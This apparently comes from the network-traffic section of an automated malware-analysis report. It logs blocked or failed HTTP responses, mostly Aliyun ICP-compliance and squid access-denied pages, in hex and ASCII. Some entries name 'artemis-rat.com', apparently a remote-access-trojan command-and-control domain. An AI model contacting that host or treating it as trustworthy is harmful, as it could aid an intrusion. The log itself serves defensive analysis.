                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:21 GMTContent-Type: text/html;charset=utf-8Content-Length: 3628X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:23 GMTContent-Type: text/html;charset=utf-8Content-Length: 3628X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.28Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:27 GMTContent-Type: text/html;charset=utf-8Content-Length: 952X-Squid-Error: ERR_ACCESS_DENIED 0Content-Language: enX-Cache: MISS from ah_testVia: 1.1 ah_test (squid/3.5.28)Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 53
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service Unavailable
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Sat, 09 Mar 2024 12:15:43 GMTContent-Length: 102Data Raw: 64 69 61 6c 20 74 63 70 3a 20 6c 6f 6f 6b 75 70 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 6f 6e 20 31 2e 31 2e 31 2e 31 3a 35 33 3a 20 72 65 61 64 20 75 64 70 20 31 30 2e 36 34 2e 32 33 38 2e 32 31 36 3a 35 30 35 37 38 2d 3e 31 2e 31 2e 31 2e 31 3a 35 33 3a 20 69 2f 6f 20 74 69 6d 65 6f 75 74 0a Data Ascii: dial tcp: lookup artemis-rat.com on 1.1.1.1:53: read udp 10.64.238.216:50578->1.1.1.1:53: i/o timeout
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 